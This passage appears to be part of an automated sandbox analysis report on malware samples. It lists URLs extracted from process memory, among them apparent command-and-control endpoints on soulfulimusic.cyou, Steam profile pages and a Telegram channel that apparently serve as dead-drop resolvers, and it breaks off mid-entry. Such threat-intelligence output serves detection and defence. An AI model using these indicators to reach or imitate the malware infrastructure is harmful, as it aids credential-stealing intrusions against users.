Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: svchost.exe, 0000000C.00000003.2609913977.000002707D94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: KbSwZup.exe, 0000001C.00000003.3132089180.000000000130C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3131828947.00000000012F4000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000002.3267015701.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/
Source: KbSwZup.exe, 0000001C.00000003.3241311719.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/2D
Source: cbf2b6294a.exe, 00000019.00000003.3072945144.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3060883563.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3065177034.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/H:
Source: cbf2b6294a.exe, 00000019.00000003.3072945144.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/P9
Source: KbSwZup.exe, 0000001C.00000003.3132089180.000000000130C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000002.3267015701.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/api
Source: KbSwZup.exe, 0000001C.00000003.3194955619.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/api0Z
Source: KbSwZup.exe, 0000001C.00000002.3266020393.000000000130E000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3241194578.000000000130D000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3252787648.000000000130D000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3211062171.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apiV
Source: KbSwZup.exe, 0000001C.00000003.3132154385.000000000132A000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3131828947.000000000130A000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3132089180.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apiX)k
Source: cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3106028667.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apic)
Source: cbf2b6294a.exe, 00000019.00000002.3112859411.00000000055E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apij2
Source: KbSwZup.exe, 0000001C.00000003.3241311719.0000000001380000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3254089928.0000000001380000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3252482944.0000000001380000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000002.3267015701.0000000001380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apirE
Source: cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3072945144.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3101878145.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3107438126.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apis
Source: cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3072945144.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3060883563.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3101878145.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3065177034.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3107438126.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/apite
Source: cbf2b6294a.exe, 00000019.00000003.3050260986.00000000055E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/ed_installW
Source: cbf2b6294a.exe, 00000019.00000002.3107602172.0000000000B65000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3101975114.0000000000B65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou/p:N
Source: cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3050260986.00000000055E5000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3106028667.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3211062171.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou:443/api
Source: cbf2b6294a.exe, 00000019.00000003.3050260986.00000000055E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou:443/apiicrosoft
Source: cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000002.3106028667.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soulfulimusic.cyou:443/apiles
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/&0
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/com1Ec
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854877130.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/p
Source: BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000742000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119480347.0000000000742000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
Source: b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128Z(
Source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199824159981
Source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199824159981a110mgzMozilla/5.0
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854877130.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KbSwZup.exe, 0000001C.00000003.3171054247.0000000005CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tn
Source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp	String found in binary or memory: https://t.me/sok33tna110mgzMozilla/5.0
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.000000000093E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tnc
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.000000000093E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sok33tnw
Source: Bjkm5hE.exe, 00000026.00000002.3407509543.00000000009C5000.00000004.00000020.00020000.00000000.sdmp, Bjkm5hE.exe, 00000026.00000002.3407509543.0000000000994000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: KbSwZup.exe, 0000001C.00000003.3131828947.000000000130A000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3132089180.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C27000.00000004.00000020.00020000.00000000.sdmp, 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2875119965.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2874970623.00000000017D9000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001753000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876515445.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2875039832.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 